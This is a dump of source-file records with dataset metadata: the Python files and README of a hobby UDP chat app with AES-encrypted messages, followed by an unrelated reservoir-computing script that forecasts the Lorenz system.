console\n\n**2020-07-02:01-26**\n- Added changelog\n- Cross-platform icons implemented\n- Switch to `poetry run` system\n- Fixed run dirs for built and source code versions\n- Fixed `build.py` script deps\n- Remove `.png` icon from source. `ico` works perfectly.\n- Rename `compile.py` script to `build.py`" }, { "alpha_fraction": 0.47694703936576843, "alphanum_fraction": 0.49096572399139404, "avg_line_length": 29.283018112182617, "blob_id": "577569a035a6cf0374c531154b6f5aacfe068b48", "content_id": "fd43c05b85e31752295ae64067342bfcbf07333e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6420, "license_type": "permissive", "max_line_length": 120, "num_lines": 212, "path": "/VectorMessenger/MessengerCore/Helpers/Global.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "\"\"\" Global helpers for client and server \"\"\"\n\nimport ujson as json\nimport os\nfrom datetime import datetime\n\n\n# CONSTS\nVERSION = \"B202008020120\"\nVERSION_UPDATE_API = \"https://docs.google.com/document/d/1jFWDZzJEPdsjs3JqcVKMfRzaFuz8VTrDc15JxsUJRUA/export?format=txt\"\nICON_CLIENT_PATH = './data/ico/VMClient.ico'\nICON_SERVER_PATH = './data/ico/VMServer.ico'\nCONFIG_DIR = './data/config'\nCONFIG_SERVER = 'config_server.json'\nCONFIG_CLIENT = 'config_client.json'\nDEF_AES_KEY = 'ChangeMeNOW'\nCONNECTION_PORT = 31635\nFORCE_IP = None\n\nAPPDICT = {\n 'client': {\n 'title': 'Vector Messenger',\n 'config_default': {\n 'username': 'Anonymous',\n 'aes_key': DEF_AES_KEY,\n 'connection': {\n 'ip': 'localhost',\n 'port': 31635\n },\n 'ui': {\n 'theme_selected': 'light',\n 'root': {\n 'font': 'Helvetica 14',\n 'theme_light': {\n 'text': '#000000',\n 'frame_bg': '#ffffff',\n 'chat_bg': '#ffffff',\n 'message_input_bg': '#ffffff',\n 'buttond_send_bg': '#dfdfdf',\n 'buttond_send_fg': '#000000'\n },\n 'theme_dark': {\n 'text': '#ffffff',\n 'frame_bg': '#181818',\n 'chat_bg': '#303030',\n 'message_input_bg': '#252525',\n 'buttond_send_bg': '#303030',\n 'buttond_send_fg': '#ffffff'\n }\n },\n 'settings': {\n 'theme_light': {},\n 'theme_dark': {}\n },\n 'debug_console': {\n 'font': 'Consolas 10'\n }\n }\n }\n },\n 'server': {\n 'title': 'VM Server',\n 'config_default': {\n 'connection': {\n 'port': 31635\n }\n }\n }\n}\n\n# Global Functions\n\n\ndef create_log(text: str, echo=False):\n \"\"\"\n Create log output to stdout or another function if ui_log defined\n\n Arguments:\n text {str} -- Log text\n\n Keyword Arguments:\n ui_log {function} -- Log function (default: {None})\n echo {bool} -- Return formatted log string without printing it (default: {False})\n \"\"\"\n if echo:\n return f'[{datetime.now().strftime(\"%H:%M:%S:%f\")}] {text}'\n else:\n print(f'[{datetime.now().strftime(\"%H:%M:%S:%f\")}] {text}')\n\n\n# Global Classes\n\n\nclass VMConfig:\n @classmethod\n def get(cls, conf_type: int) -> dict:\n \"\"\"\n Get the VM .json config as dict\n\n Arguments:\n conf_type {int} -- Type of config file (0 - Server, 1 - Client)\n\n Returns:\n dict -- Formatted .json as dict. __len__() == 0 if json not found.\n \"\"\"\n cfg_path = cls.getConfigPath(conf_type)\n if os.path.isfile(cfg_path):\n with open(cfg_path, 'rt') as f:\n cfg = json.load(f)\n if conf_type == 1 and FORCE_IP:\n cfg['connection']['ip'] = FORCE_IP\n return cfg\n else:\n return cfg\n else:\n return {}\n\n @classmethod\n def write(cls, cfg: dict, conf_type: int):\n \"\"\"\n Update json values from dict\n\n Arguments:\n cfg {dict} -- python dict to update from\n\n Keyword Arguments:\n conf_type {int} -- Type of config file (0 - Server, 1 - Client)\n \"\"\"\n cfg_path = cls.getConfigPath(conf_type)\n with open(cfg_path, 'wt') as configFile:\n json.dump(cfg, configFile, indent=4)\n\n @classmethod\n def reset(cls, conf_type: int):\n \"\"\"\n Reset config json to default values\n\n Arguments:\n conf_type {int} -- 0 - Server, 1 - Client\n \"\"\"\n cls.delete(conf_type)\n cls.init(conf_type)\n\n @classmethod\n def delete(cls, conf_type: int) -> bool:\n \"\"\"\n Running this method will completely delete json config\n\n Arguments:\n conf_type {int} -- 0 - Server, 1 - Client\n\n Returns:\n bool -- True - file was successfully removed, False - can't find file to remove\n \"\"\"\n cfg_path = cls.getConfigPath(conf_type)\n if os.path.isfile(cfg_path):\n os.remove(cfg_path)\n return True\n else:\n return False\n\n @classmethod\n def init(cls, conf_type: int) -> dict:\n \"\"\"\n Checks for .json config files existance and creates a new one if not exist\n\n Arguments:\n conf_type {int} -- Select type of config. 0 - Server, 1 - Client\n\n Returns:\n dict -- Returns config .json parsed to dict\n \"\"\"\n\n exist = False\n if conf_type == 0:\n if not os.path.isdir(CONFIG_DIR):\n os.makedirs(CONFIG_DIR)\n create_log('Created config dir')\n cfgserver_path = os.path.join(CONFIG_DIR, CONFIG_SERVER)\n if os.path.isfile(cfgserver_path):\n create_log('Config file was found')\n exist = True\n if not exist:\n cls.write(APPDICT['server']['config_default'], conf_type)\n return cls.get(conf_type)\n elif conf_type == 1:\n if not os.path.isdir(CONFIG_DIR):\n os.makedirs(CONFIG_DIR)\n create_log('Created config dir')\n cfgclient_path = os.path.join(CONFIG_DIR, CONFIG_CLIENT)\n if os.path.isfile(cfgclient_path):\n create_log('Config file was found')\n exist = True\n if not exist:\n cls.write(APPDICT['client']['config_default'], conf_type)\n create_log(f'Config file successfully generated < {os.path.abspath(cfgclient_path)} >')\n return cls.get(conf_type)\n\n @staticmethod\n def getConfigPath(conf_type: int) -> str:\n \"\"\"\n Will return config path\n\n Arguments:\n conf_type {int} -- 0 - Server, 1 - Client\n\n Returns:\n str -- Path to json config\n \"\"\"\n path = CONFIG_SERVER if conf_type == 0 else CONFIG_CLIENT\n cfg_path = os.path.join(CONFIG_DIR, path)\n return cfg_path\n" }, { "alpha_fraction": 0.5824403762817383, "alphanum_fraction": 0.5890079736709595, "avg_line_length": 33.03529357910156, "blob_id": "984300e05289022a5eac6bc908a3830e6a1fd448", "content_id": "7af7c1b25268510b5f053e125d48a11946c51186", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2893, "license_type": "permissive", "max_line_length": 104, "num_lines": 85, "path": "/VectorMessenger/MessengerCore/Helpers/Client.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "\"\"\" Helpers for client-side \"\"\"\n\nimport sys\nfrom urllib import error as urllib_error\nfrom urllib import request\nimport json\nfrom PIL import Image, ImageTk\n\nfrom VectorMessenger.MessengerCore.Helpers import Global as h\n\n\ndef iconbitmap_universal(window: object, icon_image=h.ICON_CLIENT_PATH):\n \"\"\" Cross-platform icon loader for tkinter windows.\n\n Args:\n window (object): Tkinter window to apply icon to.\n icon_image (str)(Optional): Path to icon image.\n \"\"\"\n image_pil = Image.open(icon_image)\n image_tk = ImageTk.PhotoImage(image_pil)\n window.tk.call('wm', 'iconphoto', window._w, image_tk)\n\n\nclass RedirectSTD:\n def __init__(self, text_widget: object):\n \"\"\" Redirect STD(-OUT & -ERR) to tkinter Text widget.\n\n Args:\n text_widget (object): Tkinter Text widget.\n \"\"\"\n self.__text_widget = text_widget\n self.redirect()\n\n def redirect(self):\n sys.stdout = self.__STD2TK(self.__text_widget)\n sys.stderr = self.__STD2TK(self.__text_widget)\n\n def disable(self):\n sys.stdout = sys.__stdout__\n sys.stderr = sys.__stderr__\n\n class __STD2TK:\n def __init__(self, text_widget):\n \"\"\" Low level redirect STD(-OUT & -ERR) to tkinter Text widget realisation.\n\n Args:\n text_widget (object): Tkinter Text widget.\n \"\"\"\n self.__text_widget = text_widget\n\n def write(self, string):\n self.__text_widget.config(state=\"normal\")\n self.__text_widget.insert(\"end\", f'{string}')\n self.__text_widget.see(\"end\")\n self.__text_widget.config(state=\"disabled\")\n\n\nclass UpdateChecker:\n \"\"\"\n VM Update checker. Currently it works with modifying tk.Menu bar label, so its kinda hardcoded, yes.\n \"\"\"\n def __init__(self, ui_ctrl):\n self.__U_NOUPDATES = '[ \\u2713 ]'\n self.__U_OUTDATE = '[ \\u2191 ]'\n\n self.__ui_ctrl = ui_ctrl\n\n def check(self):\n self.__ui_ctrl.entryconfig(4, label='Checking for updates \\u2B6E')\n try:\n h.create_log('Checking for updates')\n content = request.urlopen(h.VERSION_UPDATE_API).read().decode('utf-8')\n except urllib_error.URLError:\n self.__ui_ctrl.entryconfig(4, label=\"\")\n h.create_log(\"Can't check for updates. No connection to network or source unavailable\")\n else:\n if 'docs.google.com' in h.VERSION_UPDATE_API:\n content = content[1:]\n content = json.loads(content)\n if h.VERSION == content['version']:\n self.__ui_ctrl.entryconfig(4, label=f'Up-To-Date {self.__U_NOUPDATES}')\n h.create_log('Version is up to date')\n else:\n self.__ui_ctrl.entryconfig(4, label=f'Update Available {self.__U_OUTDATE}')\n h.create_log('Update is available')\n" }, { "alpha_fraction": 0.5967413187026978, "alphanum_fraction": 0.6003054976463318, "avg_line_length": 34.70909118652344, "blob_id": "254c1a8e5df31988d50a4f06f4826f4ddb048334", "content_id": "43c9446fd6c06d9820f4de3df61c88a511b46a3d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1964, "license_type": "permissive", "max_line_length": 136, "num_lines": 55, "path": "/VectorMessenger/MessengerCore/CoreClient.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "import socket\nfrom threading import Thread\n\nfrom VectorMessenger.MessengerCore.Helpers import Global as h\nfrom VectorMessenger.MessengerCore.MessengerBase import VMUDPBase\nfrom VectorMessenger.MessengerCore.Encryption import VMCrypt\n\n\nclass MessengerClient(VMUDPBase):\n def __init__(self, vm_client_ui=None):\n super().__init__()\n self.ui = vm_client_ui\n self.cfg = h.VMConfig.init(1)\n self.start_message_polling()\n\n def send_message(self, text=''):\n \"\"\"\n Send message to server\n\n Arguments:\n text {str} -- Text of message\n \"\"\"\n self.__refresh_config()\n message = VMCrypt.encrypt('@{}: {}'.format(self.cfg['username'], text))\n self.sock.sendto(message, (self.cfg['connection']['ip'], self.cfg['connection']['port']))\n\n def register_user(self):\n \" Register user on server \"\n self.__refresh_config()\n self.sock.sendto(f'VM{h.VERSION}_REGISTER_USER'.encode('utf-8'), (self.cfg['connection']['ip'], self.cfg['connection']['port']))\n\n def start_message_polling(self):\n def run_message_polling_thread():\n h.create_log('Message polling thread is active')\n while self.message_polling_enabled:\n try:\n data, _ = self.sock.recvfrom(8192)\n except socket.error:\n pass\n else:\n msg = VMCrypt.decrypt(data)\n self.ui.show_message(msg)\n h.create_log('Received message')\n h.create_log('Message polling thread was stopped')\n\n self.message_polling_enabled = True\n self.message_polling_thread = Thread(target=run_message_polling_thread, daemon=True)\n self.message_polling_thread.start()\n\n def stop_message_polling(self):\n self.message_polling_enabled = False\n self.sock.close()\n\n def __refresh_config(self):\n self.cfg = h.VMConfig.get(1)\n" }, { "alpha_fraction": 0.5943992733955383, "alphanum_fraction": 0.6124660968780518, "avg_line_length": 29.75, "blob_id": "efa81ab17e0f6eb51299ca19fa6c98ff4bffad96", "content_id": "83174bc42acda383bad9cfcf80ce3f2ff4eea3b8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1107, "license_type": "permissive", "max_line_length": 105, "num_lines": 36, "path": "/VectorMessenger/MessengerCore/Encryption.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "from io import BytesIO\nimport pyAesCrypt\n\nfrom VectorMessenger.MessengerCore.Helpers import Global as h\n\n\nclass VMCrypt:\n @staticmethod\n def encrypt(text: str) -> bytes:\n passwd = h.VMConfig.get(1)['aes_key']\n bufferSize = 128 * 1024\n text_bin = text.encode('utf-8')\n text_file = BytesIO(text_bin)\n result_file = BytesIO()\n pyAesCrypt.encryptStream(text_file, result_file, passwd, bufferSize)\n return result_file.getvalue()\n\n @staticmethod\n def decrypt(encoded_bytes: bytes) -> str:\n passwd = h.VMConfig.get(1)['aes_key']\n bufferSize = 128 * 1024\n encb_file = BytesIO(encoded_bytes)\n decb_file = BytesIO()\n\n try:\n pyAesCrypt.decryptStream(encb_file, decb_file, passwd, bufferSize, len(encb_file.getvalue()))\n except ValueError:\n return '< Cant decrypt incoming message >'\n else:\n return decb_file.getvalue().decode('utf-8')\n\n @staticmethod\n def set_key(key: str):\n cfg = h.VMConfig.get(1)\n cfg['aes_key'] = key\n h.VMConfig.write(cfg, 1)\n" }, { "alpha_fraction": 0.5539849400520325, "alphanum_fraction": 0.5575940012931824, "avg_line_length": 33.63541793823242, "blob_id": "073ad6537d7b67bd5d38aa580f010f6a9a9fd1ea", "content_id": "b28f41c38b592b664edde49987ce42ab423d5fd1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3325, "license_type": "permissive", "max_line_length": 269, "num_lines": 96, "path": "/README.md", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "<p align=\"center\">\n\t<img src=\"./.github/VMLogo.png\" width=128><br>\n\t<b>Vector Messenger</b>\n</p>\n\n---\n- [Information](#information)\n- [Features](#features)\n- [Client](#client)\n - [Information](#information-1)\n - [Startup Args](#startup-args)\n - [Debug Console Commands](#debug-console-commands)\n- [Server](#server)\n - [Information](#information-2)\n - [Startup Args](#startup-args-1)\n- [Preparing Source](#preparing-source)\n - [For Development](#for-development)\n - [For Building](#for-building)\n- [Special Thanks](#special-thanks)\n\n---\n## Information\nSimple python-based ui application for network global chatting through UDP protocol. Source code can be launched and built <ins>only</ins> on `python 3.7`. This project was made just to understand how it all works, so don't expect it to be an awesome piece of software.\n\n\n## Features\n- Cross platform GUI client\n- AES256-CBC message client-side encryption\n\n\n## Client\n\n### Information\nMain File: `./VectorMessenger/client.py` \nRun From Source: `poetry run client`\n\n### Startup Args\n| Argument | Description |\n| :------------------ | :----------------------- |\n| `--disable-updater` | Disable VM Updater start |\n\n### Debug Console Commands\n| Command | Description |\n| :--------------- | :------------------------------------------------------------------------- |\n| `clear` | Clear debug window output |\n| `clear-chat` | Clear all messages in chat widget |\n| `refresh-theme` | Read config .json values and update theme |\n| `polling-stop` | Will stop message polling thread |\n| `test-raise` | This command will raise test exception that <ins>will crash</ins> this app |\n| `version` | Print app version |\n| `updates-check` | Check for available updates |\n| `eval <COMMAND>` | Execute `<COMMAND>` in python interpreter |\n\nNote, that all commands are <ins>case sensitive</ins>!\n\n\n## Server\n\n### Information\nMain File: `./VectorMessenger/server.py` \nRun From Source `poetry run server`\n\n### Startup Args\n| Argument | Description |\n| :------------ | :---------------------- |\n| `--localhost` | Run server on localhost |\n\n\n## Preparing Source\n- First of all you need to install the [poetry](https://pypi.org/project/poetry/) dependency manager with pip.\n- If you're on Linux, you will have to install `python3-tk` to your system. `Tkinter` currently used as the base of cross platform gui for client.\n\n### For Development\n```bash\n# Install all dependencies, including development\n$ poetry install\n```\n\n### For Building\n```bash\n# Install all base dependencies\n$ poetry install --no-dev\n\n# Build client and server\n# Run script with argument --help \n# or read build.py docstring for more information\n$ poetry run python build.py\n```\n\n\n## Special Thanks\n| <ins>Closed Alpha Testers</ins> |\n| :------------------------------ |\n| Dmitry |\n| Max \"Forzz\" Bannov |\n| Nikita \"CrazyFearka\" Stepanov |\n" } ]
13
majorminus66/trend_2020
https://github.com/majorminus66/trend_2020
02aeef0805e1edb5111b0fc16e4c9b2ea855515e
7b71c9509518a888f564ba79f21d3e36661a9481
07ec62361fb2e2301bdeedf012daff6789a26b73
refs/heads/master
2023-06-21T08:31:05.039939
2021-07-14T17:01:41
2021-07-14T17:01:41
273,049,933
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.524720311164856, "alphanum_fraction": 0.5693973302841187, "avg_line_length": 39.040462493896484, "blob_id": "fc775d012c91b2119da30268730c94883b355bd0", "content_id": "4b37f3ce9aaf43e044cd1d43649a3d7c0a3170ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13855, "license_type": "no_license", "max_line_length": 243, "num_lines": 346, "path": "/fall2020multipletraining", "repo_name": "majorminus66/trend_2020", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 3 12:57:49 2020\n\n@author: josephharvey\n\"\"\"\n\nfrom lorenzrungekutta import rungekutta\nfrom lorenzrungekutta import fx\nfrom lorenzrungekutta import fy\nfrom lorenzrungekutta import fz\nimport numpy as np\n#from sklearn.linear_model import Ridge\nfrom scipy import sparse\nfrom scipy.linalg import solve\nfrom scipy.sparse.linalg import eigs\nfrom scipy.stats import wasserstein_distance\nfrom matplotlib import pyplot as plt\n\nclass Reservoir:\n def __init__(self, rk, rsvr_size = 300, spectral_radius = 0.6, input_weight = 1):\n self.rsvr_size = rsvr_size\n \n #get spectral radius < 1\n #gets row density = 0.03333\n unnormalized_W = (np.random.rand(rsvr_size,rsvr_size)*2 - 1)\n for i in range(unnormalized_W[:,0].size):\n for j in range(unnormalized_W[0].size):\n if np.random.rand(1) > 10/rsvr_size:\n unnormalized_W[i][j] = 0\n \n max_eig = eigs(unnormalized_W, k = 1, return_eigenvectors = False, maxiter = 10**5)\n \n self.W = sparse.csr_matrix(spectral_radius/np.abs(max_eig)*unnormalized_W)\n \n const_conn = int(rsvr_size*0.15)\n Win = np.zeros((rsvr_size, 4))\n Win[:const_conn, 0] = (np.random.rand(Win[:const_conn, 0].size)*2 - 1)*input_weight\n Win[const_conn: const_conn + int((rsvr_size-const_conn)/3), 1] = (np.random.rand(Win[const_conn: const_conn + int((rsvr_size-const_conn)/3), 1].size)*2 - 1)*input_weight\n Win[const_conn + int((rsvr_size-const_conn)/3):const_conn + 2*int((rsvr_size-const_conn)/3), 2] = (np.random.rand(Win[const_conn + int((rsvr_size-const_conn)/3):const_conn + 2*int((rsvr_size-const_conn)/3), 2].size)*2 - 1)*input_weight\n Win[const_conn + 2*int((rsvr_size-const_conn)/3):, 3] = (np.random.rand(Win[const_conn + 2*int((rsvr_size-const_conn)/3):, 3].size)*2 - 1)*input_weight\n \n self.Win = sparse.csr_matrix(Win)\n self.X = (np.random.rand(rsvr_size, rk.train_length+2)*2 - 1)\n self.Wout = np.array([])\n \nclass RungeKutta:\n def __init__(self, x0 = 2,y0 = 2,z0 = 23, h = 0.01, T = 300, ttsplit = 5000, noise_scaling = 0):\n u_arr = rungekutta(x0,y0,z0,h,T)[:, ::10] \n self.train_length = ttsplit\n \n u_arr[0] = (u_arr[0] - 0)/7.929788629895004\n u_arr[1] = (u_arr[1] - 0)/8.9932616136662\n u_arr[2] = (u_arr[2] - 23.596294463016896)/8.575917849311919\n \n self.u_arr_train = u_arr[:, :ttsplit+1] \n #size 5001\n \n #noisy training array\n #switch to gaussian \n noise = np.random.randn(self.u_arr_train[:,0].size, self.u_arr_train[0,:].size)*noise_scaling \n self.u_arr_train_noise = self.u_arr_train + noise\n \n #plt.plot(self.u_arr_train_noise[0, :500])\n \n #u[5000], the 5001st element, is the last in u_arr_train and the first in u_arr_test\n self.u_arr_test = u_arr[:, ttsplit:]\n #size 1001\n \n#takes a reservoir object res along with initial conditions\ndef getX(res, rk,x0 = 1,y0 = 1,z0 = 1, noise = False):\n \n if noise:\n u_training = rk.u_arr_train_noise\n else:\n u_training = rk.u_arr_train\n \n #loops through every timestep\n for i in range(0, u_training[0].size):\n u = np.append(1, u_training[:,i]).reshape(4,1)\n \n x = res.X[:,i].reshape(res.rsvr_size,1)\n x_update = np.tanh(np.add(res.Win.dot(u), res.W.dot(x)))\n \n res.X[:,i+1] = x_update.reshape(1,res.rsvr_size) \n \n return res.X\n \ndef trainRRM(res, rk, skip = 150):\n print(\"Training... \")\n\n alph = 10**-4 #try -2, -3, -4, -5, -6\n #rrm = Ridge(alpha = alph, solver = 'cholesky')\n \n #train on 10 small training sets with different noise - minimize error over all\n #save the state of the reservoir for noisy datasets\n #also try - train on signal^2 or other function (get more info than just 3 vars) - no noise\n \n Y_train = rk.u_arr_train_noise[:, skip+1:]\n\n \n X = getX(res, rk, noise = True)[:, skip+1:(res.X[0].size - 1)]\n X_train = np.concatenate((np.ones((1, rk.u_arr_train[0].size-(skip+1))), X, rk.u_arr_train_noise[:, skip:-1]), axis = 0) \n #X_train = np.copy(X)\n \n idenmat = np.identity(res.rsvr_size+4)*alph\n data_trstates = np.matmul(Y_train, np.transpose(X_train))\n states_trstates = np.matmul(X_train,np.transpose(X_train))\n res.Wout = np.transpose(solve(np.transpose(states_trstates + idenmat),np.transpose(data_trstates)))\n \n print(\"Training complete \")\n #Y_train = Y_train.transpose()\n #X_train = X.transpose()\n \n #tweak regression param? use 10^-4, 10^-6\n #test Ridge() in simpler context\n #rrm.fit(X_train,Y_train)\n #res.Wout = rrm.coef_\n return res.Wout\n\ndef repeatTraining(res, T = 300, ttsplit = int(300/0.1), repeat_times = 10, skip = 150, noise_scaling = 0.1):\n ic = np.random.rand(3)*2-1\n rk = RungeKutta(x0 = ic[0], y0 = ic[1], z0 = 30*ic[2], T = T, ttsplit = ttsplit, noise_scaling = noise_scaling)\n \n print(\"Training... \")\n\n alph = 10**-4\n #rrm = Ridge(alpha = alph, solver = 'cholesky')\n \n #train on 10 small training sets with different noise - minimize error over all\n #save the state of the reservoir for noisy datasets\n #also try - train on signal^2 or other function (get more info than just 3 vars) - no noise\n \n Y_train = rk.u_arr_train[:, skip+1:] \n oneTime = rk.u_arr_train[:, skip+1:]\n \n X = getX(res, rk, noise = True)[:, skip+1:-1]\n \n Y_inputs = rk.u_arr_train_noise[:, skip:(rk.u_arr_train_noise[0].size - 1)]\n for i in range(repeat_times-1):\n Y_train = np.concatenate((Y_train, oneTime), axis = 1)\n noise = np.random.randn(rk.u_arr_train[:,0].size, rk.u_arr_train[0,:].size)*noise_scaling\n rk.u_arr_train_noise = rk.u_arr_train + noise \n X = np.concatenate((X, getX(res, rk, noise = True)[:, skip+1:-1]), axis = 1)\n Y_inputs = np.concatenate((Y_inputs, rk.u_arr_train_noise[:, skip:(rk.u_arr_train_noise[0].size - 1)]), axis = 1) \n \n X_train = np.concatenate((np.ones((1, repeat_times*(rk.u_arr_train[0].size-(skip+1)))), X, Y_inputs), axis = 0) \n #X_train = np.copy(X)\n \n idenmat = np.identity(res.rsvr_size+4)*alph\n data_trstates = np.matmul(Y_train, np.transpose(X_train))\n states_trstates = np.matmul(X_train,np.transpose(X_train))\n res.Wout = np.transpose(solve(np.transpose(states_trstates + idenmat),np.transpose(data_trstates)))\n \n print(\"Training complete \")\n #Y_train = Y_train.transpose()\n #X_train = X.transpose()\n \n #tweak regression param? use 10^-4, 10^-6\n #test Ridge() in simpler context\n #rrm.fit(X_train,Y_train)\n #res.Wout = rrm.coef_\n return res.Wout \n\ndef repeatTrainingAvg(res, T = 100, ttsplit = 400, repeat_times = 10, noise_scaling = 0.01): \n rk = RungeKutta(T = T,ttsplit = ttsplit) \n Wout_final = np.zeros((3,res.rsvr_size+4))\n \n for i in range(repeat_times):\n noise = np.random.randn(rk.u_arr_train[:,0].size, rk.u_arr_train[0,:].size)*noise_scaling \n rk.u_arr_train_noise = rk.u_arr_train + noise\n Wout_final = np.add(Wout_final, trainRRM(res, rk, skip = 100))\n \n res.Wout = Wout_final/repeat_times\n \n#CONCATENATE ALL THE DATA BEFORE RUNNING REGRESSION\n \ndef predict(res, x0 = 0, y0 = 0, z0 = 0, steps = 1000):\n Y = np.empty((3, steps + 1))\n X = np.empty((res.rsvr_size, steps + 1))\n \n Y[:,0] = np.array([x0,y0,z0]).reshape(1,3) \n X[:,0] = res.X[:,-2]\n\n \n for i in range(0, steps):\n y_in = np.append(1, Y[:,i]).reshape(4,1)\n x_prev = X[:,i].reshape(res.rsvr_size,1)\n \n x_current = np.tanh(np.add(res.Win.dot(y_in), res.W.dot(x_prev)))\n X[:,i+1] = x_current.reshape(1,res.rsvr_size)\n #X = np.concatenate((X, x_current), axis = 1)\n \n y_out = np.matmul(res.Wout, np.concatenate((np.array([[1]]), x_current, Y[:,i].reshape(3,1)), axis = 0))\n #y_out = np.matmul(res.Wout, x_current)\n Y[:,i+1] = y_out.reshape(1, 3)\n \n\n return Y\n\ndef test(res, num_tests = 10, rkTime = 1000, split = 3000, showMapError = True, showTrajectories = True, showHist = True):\n\n stable_count = 0\n valid_time = np.array([])\n max_sum_square = np.array([])\n mean_sum_square = np.array([]) \n means = np.zeros(num_tests)\n variances = np.zeros(num_tests)\n \n for i in range(num_tests):\n \n vtchange = 0\n x2y2z2 = np.array([])\n \n ic = np.random.rand(3)*2-1\n rktest = RungeKutta(x0 = ic[0], y0 = ic[1], z0 = 30*ic[2], T = rkTime, ttsplit = split)\n res.X = (np.zeros((res.rsvr_size, split+2))*2 - 1)\n \n #sets res.X\n getX(res, rktest)\n \n pred = predict(res, x0 = rktest.u_arr_test[0,0], y0 = rktest.u_arr_test[1,0], z0 = rktest.u_arr_test[2,0], steps = (int(rkTime/0.1)-split))\n lorenz_map_x = np.zeros(pred[0].size)\n lorenz_map_x[0] = pred[0][0]\n \n check_vt = True\n for j in range(0, pred[0].size):\n if (j > 0):\n vtchange = vtchange + (rktest.u_arr_test[0, j] - rktest.u_arr_test[0, j-1])**2 + (rktest.u_arr_test[1, j] - rktest.u_arr_test[1, j-1])**2 + (rktest.u_arr_test[2, j] - rktest.u_arr_test[2, j-1])**2\n \n rkmap = RungeKutta(pred[0][j-1]*7.929788629895004, pred[1][j-1]*8.9932616136662, pred[2][j-1]*8.575917849311919+23.596294463016896, h=0.01, T=0.1)\n lorenz_map_x[j] = rkmap.u_arr_train[0][1] \n \n #EXAMINE!!!\n x2error = (pred[0][j]-rkmap.u_arr_train[0][1])**2\n y2error = (pred[1][j]-rkmap.u_arr_train[1][1])**2\n z2error = (pred[2][j]-rkmap.u_arr_train[2][1])**2\n \n x2y2z2 = np.append(x2y2z2, (x2error+y2error+z2error)) \n \n if (np.abs(pred[0, j] - rktest.u_arr_test[0, j]) > 1.5) and check_vt:\n valid_time = np.append(valid_time, j)\n \n print(\"Test \" + str(i) + \" valid time: \" + str(j))\n check_vt = False\n \n x2y2z2 = x2y2z2/1.45\n #print(vtchange/(pred[0].size-1)) \n #print(\"Mean: \" + str(np.mean(pred[0])))\n #print(\"Variance: \" + str(np.var(pred[0])))\n \n if showHist:\n plt.figure() \n plt.hist(pred[0], bins = 11, label = \"Predictions\", alpha = 0.75)\n plt.hist(rktest.u_arr_test[0], bins = 11, label = \"Truth\", alpha = 0.75)\n plt.legend(loc=\"upper right\")\n \n if showMapError:\n #plt.figure()\n #plt.plot(vector_field, label = \"Vector Field Stability Metric\")\n #plt.legend(loc=\"upper right\") \n\n plt.figure() \n plt.plot(x2y2z2, label = \"x + y + z square error\")\n plt.legend(loc=\"upper right\")\n \n if showTrajectories:\n plt.figure() \n #plt.plot(lorenz_map_x, label = \"Map Trajectory\", color = \"green\") \n plt.plot(pred[0], label = \"Predictions\")\n plt.plot(rktest.u_arr_test[0], label = \"Truth\") \n plt.legend(loc=\"upper right\") \n \n print(\"Variance of lorenz data x dim: \" + str(np.var(rktest.u_arr_test[0])))\n print(\"Variance of predictions: \" + str(np.var(pred[0]))) \n print(\"Max of total square error: \" + str(max(x2y2z2)))\n print(\"Mean of total error: \" + str(np.mean(x2y2z2)))\n print(\"Wasserstein distance: \" + str(wasserstein_distance(pred[0], rktest.u_arr_test[0])))\n print()\n \n max_sum_square = np.append(max_sum_square, max(x2y2z2))\n mean_sum_square = np.append(mean_sum_square, np.mean(x2y2z2)) \n \n means[i] = np.mean(pred[0])\n variances[i] = np.var(pred[0])\n \n if np.mean(x2y2z2) < 0.01 and 0.98 < np.var(pred[0]) and np.var(pred[0]) < 1.01:\n stable_count += 1\n print(\"stable\")\n print()\n else:\n print(\"unstable\")\n print() \n \n \n \n if showMapError or showTrajectories or showHist:\n plt.show()\n \n #print(\"Variance of total square error: \" + str(np.var(x2y2z2)))\n\n print(\"Avg. max sum square: \" + str(np.mean(max_sum_square)))\n print(\"Avg. mean sum square: \" + str(np.mean(mean_sum_square))) \n print(\"Avg. of x dim: \" + str(np.mean(means)))\n print(\"Var. of x dim: \" + str(np.mean(variances)))\n print()\n \n \n return stable_count/num_tests\n\n\n\n########################################\ntrain_time = 500\n\nstabilities = np.array([]) \neigenvalue_errors = 0 \n\nnoise = 10^-5\n\nresults = np.array([])\nnum_res = 50\n \nfor j in range (num_res):\n try:\n print(\"Reservoir \" + str(j+1) + \" of \" + str(num_res))\n ic = np.random.rand(3)*2-1\n rk = RungeKutta(x0 = ic[0], y0 = ic[1], z0 = 30*ic[2], T = train_time, ttsplit = int(train_time/0.1), noise_scaling = noise)\n \n res = Reservoir(rk, rsvr_size = 100, spectral_radius = 0.5, input_weight = 1.0) \n \n trainRRM(res, rk) \n #repeatTraining(res, T = train_time, ttsplit = int(train_time/0.1), repeat_times = i, noise_scaling = noise)\n results = np.append(results, test(res, 1, rkTime = 400, split = 2000, showMapError = False, showTrajectories = False, showHist = False))\n except:\n eigenvalue_errors += 1\n print(\"eigenvalue error occured.\")\n print()\nstabilities = np.append(stabilities, np.mean(results))\nprint(\"Average percentage of stability for \" + str(num_res) + \" reservoirs at \" + str(train_time) + \" training time: \" + str(np.mean(results)))\n#print(results) \nprint() \nprint(\"Stability values: \" + str(stabilities) )\nprint(\"Encountered \" + str(eigenvalue_errors) + \" eigenvalue errors\")\nprint()\n\n" }, { "alpha_fraction": 0.499051570892334, "alphanum_fraction": 0.5648089647293091, "avg_line_length": 39.11231994628906, "blob_id": 